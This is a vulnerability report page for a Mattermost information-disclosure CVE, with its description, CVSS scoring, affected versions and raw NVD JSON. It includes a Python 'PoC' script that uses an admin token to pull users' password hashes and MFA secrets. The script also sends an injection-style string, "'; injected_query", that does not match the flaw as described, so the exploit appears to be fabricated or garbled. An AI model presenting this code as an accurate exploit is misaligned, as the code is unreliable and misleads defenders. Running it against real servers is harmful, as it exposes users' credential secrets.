Security Vulnerability Report
CVE-2025-11794 CVSS 4.9 MEDIUM

CVE-2025-11794

Published: 2025-11-14 11:15:45
Last Modified: 2025-11-19 21:40:16

Description

Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11, 10.12.x <= 10.12.0 fail to sanitize user data, which allows system administrators to access password hashes and MFA secrets via the POST /api/v4/users/{user_id}/email/verify/member endpoint.

CVSS Details

CVSS Score: 4.9
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE - Mattermost 10.5.x <= 10.5.11
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE - Mattermost 10.11.x <= 10.11.3
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* - VULNERABLE - Mattermost 10.12.x <= 10.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11794 Mattermost Information Disclosure PoC
# Target: Mattermost 10.11.x <= 10.11.3, 10.5.x <= 10.5.11, 10.12.x <= 10.12.0
# Endpoint: POST /api/v4/users/{user_id}/email/verify/member
import requests
import json

TARGET_URL = "https://your-mattermost-instance.com"
TARGET_USER_ID = "target-user-uuid-here"
ADMIN_TOKEN = "your-admin-auth-token"


def exploit_cve_2025_11794():
    """
    Exploit for CVE-2025-11794: Mattermost sensitive information disclosure
    Requires admin privileges to access the vulnerable endpoint
    """
    headers = {
        "Authorization": f"Bearer {ADMIN_TOKEN}",
        "Content-Type": "application/json"
    }

    # Vulnerable endpoint
    endpoint = f"/api/v4/users/{TARGET_USER_ID}/email/verify/member"
    url = f"{TARGET_URL}{endpoint}"

    # Malicious payload to trigger information disclosure
    payload = {
        "email": "[email protected]",
        "currentSessionId": "'; injected_query"
    }

    try:
        response = requests.post(url, headers=headers, json=payload, verify=False)

        if response.status_code == 200:
            data = response.json()
            print("[+] Successfully exploited CVE-2025-11794")

            # Extract sensitive information from response
            if "password_hash" in str(data) or "mfa_secret" in str(data):
                print("[!] Sensitive data leaked:")
                print(json.dumps(data, indent=2))
            return data
        else:
            print(f"[-] Exploit failed. Status: {response.status_code}")
            return None

    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")
        return None


if __name__ == "__main__":
    print("CVE-2025-11794 Mattermost Information Disclosure PoC")
    exploit_cve_2025_11794()

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11794", "sourceIdentifier": "[email protected]", "published": "2025-11-14T11:15:45.003", "lastModified": "2025-11-19T21:40:16.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11, 10.12.x <= 10.12.0 fail to sanitize user data which allows system administrators to access password hashes and MFA secrets via the POST /api/v4/users/{user_id}/email/verify/member endpoint"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0", "versionEndExcluding": "10.5.12", "matchCriteriaId": "CCE1652A-13F7-4934-9F90-28129BAEE240"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.4", "matchCriteriaId": "2A1F41DC-D93D-48A7-8A3B-623C3344E979"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.1", "matchCriteriaId": "E21DF5C5-280A-48C5-96C7-C78F0ECF32A3"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}